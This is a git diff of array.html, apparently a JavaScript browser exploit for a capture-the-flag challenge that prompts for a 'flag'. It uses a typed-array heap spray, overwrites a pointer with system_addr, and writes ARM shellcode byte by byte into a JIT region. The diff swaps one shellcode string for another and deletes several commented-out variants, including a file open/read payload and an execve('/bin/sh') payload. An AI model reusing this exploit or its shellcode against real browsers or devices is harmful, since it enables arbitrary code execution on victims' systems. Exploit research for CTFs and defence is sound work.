--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start6777");
+alert("start6");
 var flag=prompt("flag");
 if(flag!=0){
  
@@ -178,16 +178,8 @@ spray[spray_index][typedarray_index+0x100/4]=system_addr;
 var jit_index=typedarray_index+0x38/4;
 var typedarray=spray[spray_index];
 var myarr=arrcvs[0];
-var shellcode="\x1c\xd0\x4d\xe2\x00\x20\xb0\xe3\x18\x20\x8d\xe5\x14\x00\x8d\xe5\x10\x10\x8d\xe5\x0c\x20\x8d\xe5\x28\x40\x14\xe5\x06\x00\xb0\xe3\x1c\xd0\x8d\xe2\x1e\xff\x2f\xe1";
- //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xbe\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\x50\xe3\xfc\xff\xff\x0a\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x30\x10\x9f\xe5\x00\x00\x81\xe5\x2c\x00\x9f\xe5\x2c\x10\x9f\xe5\x2c\x20\x9f\xe5\x0b\x70\xa0\xe3\x00\x00\x00\xef\x24\x10\x9f\xe5\x00\x00\x81\xe5\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x04\x02\x00\x50\x40\x00\x00\x50\x60\x00\x00\x50\x80\x00\x00\x50\x08\x02\x00\x50"
-    //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xbe\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\x50\xe3\xfc\xff\xff\x0a\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x20\x00\x9f\xe5\x20\x10\x9f\xe5\x20\x20\x9f\xe5\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50\x60\x00\x00\x50\x80\x00\x00\x50"
-    //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xbe\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\x50\xe3\xfe\xff\xff\x0a\x60\x10\x9f\xe5\x00\x00\x81\xe5\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x40\x70\xa0\xe3\x00\x00\xa0\xe1\x34\x10\x9f\xe5\x00\x00\x81\xe5\x30\x00\x9f\xe5\x30\x10\x9f\xe5\x30\x20\x9f\xe5\x0b\x70\xa0\xe3\x00\x00\x00\xef\x28\x10\x9f\xe5\x00\x00\x81\xe5\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x00\x02\x00\x50\x04\x02\x00\x50\x40\x00\x00\x50\x60\x00\x00\x50\x80\x00\x00\x50\x08\x02\x00\x50";
-    //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xbe\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\x50\xe3\xfc\xff\xff\x0a\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x20\x00\x9f\xe5\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50";
+var shellcode="\x04\xB0\x2D\xE5\x00\xB0\x8D\xE2\x1C\xD0\x4D\xE2\x18\x00\x0B\xE5\x1C\x10\x0B\xE5\x00\x30\xA0\xE3\x08\x30\x0B\xE5\x28\x40\x14\xE5\x06\x30\xA0\xE3\x03\x00\xA0\xE1\x00\xD0\x8B\xE2\x00\x08\xBD\xE8\x1E\xFF\x2F\xE1\x1E\xFF\x2F\xE1";
 
- //"\x28\x40\x14\xe5\x10\x00\x9f\xe5\x10\x10\x9f\xe5\x00\x20\x91\xe5\x00\x10\xa0\xe3\x12\xff\x2f\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50\x00\x01\x00\x50";
-    //open read sh//"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x44\x00\x9f\xe5\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x05\x70\xa0\xe3\x00\x00\x00\xef\x34\x10\x9f\xe5\x00\x00\x81\xe5\x00\x00\xa0\xe1\x2c\x10\x9f\xe5\x10\x20\xa0\xe3\x03\x70\xa0\xe3\x00\x00\x00\xef\x20\x10\x9f\xe5\x00\x00\x81\xe5\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50\x00\x02\x00\x50\x00\x01\x00\x50\x08\x02\x00\x50"
-    //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x3c\x00\x9f\xe5\x00\x10\xa0\xe3\x04\x20\xa0\xe3\x05\x70\xa0\xe3\x00\x00\x00\xef\x2c\x10\x9f\xe5\x00\x00\x81\xe5\x00\x00\xa0\xe1\x24\x10\x9f\xe5\x10\x20\xa0\xe3\x03\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50\x00\x02\x00\x50\x00\x01\x00\x50";
-    //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xbe\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1";    //"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x08\x30\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68";
 for(var i=0;i<shellcode.length;i++){
  myarr[0]=shellcode.charCodeAt(i);
  typedarray[jit_index]+=1;
